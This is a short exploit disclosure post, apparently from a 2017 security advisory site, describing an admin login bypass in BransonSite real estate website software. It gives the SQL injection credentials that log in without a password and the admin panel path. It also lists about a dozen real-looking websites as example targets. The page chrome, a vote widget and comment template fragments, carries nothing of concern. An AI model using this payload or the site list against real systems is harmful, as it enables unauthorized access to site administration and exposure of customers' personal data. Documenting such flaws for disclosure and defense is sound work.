BransonSite Admin Panel bypass

2017.10.27
Credit: SonnySpooks
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|--------------------------------------| | BransonSite Admin Panel bypass | |--------------------------------------| Author: SonnySpooks Twitter: @SonnySpooks Username: '=' 'OR' Password: '=' 'OR' AdminLocation: /search/admin.php |-----------------------------------------------------------------| | BransonsSite Software Is a common software used on realestate | | sites. This Leaves multiple sites Vulnerable to exposure to | | Personal info/Damage To Sales in properties. This is a big | | risk for people using the software that isnt even at its best. | | Software that comes this vulnerable with a pricetag is one of | | the most pathetic things ive came cross in times. Fix The | | Security. Best of luck to all of you who find this interesting. | |-----------------------------------------------------------------| |-----------------------------------------------------------------| | Examples | | http://www.attablerocklake.com/search/admin.php | | http://whatsmyhouseworthbranson.com/search/adminsiteact.php | | http://www.sharonslakehomes.com/search/admin.php | | http://realestate.bransonsites.com/search/admin.php | | http://www.bransontablerocklakehomes.com/search/admin.php | | http://www.attablerocklake.com/search/admin.php | | http://jimstockton.com/search/admin.php | | http://www.drinkdinghy.com/search/admin.php | | http://www.w3costaricacoffee.com/search/admin.php | | http://www.lakepropertiesbranson.com/search/admin.php | | http://bransonbusinessforsale.com/search/admin.php | |-----------------------------------------------------------------|


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top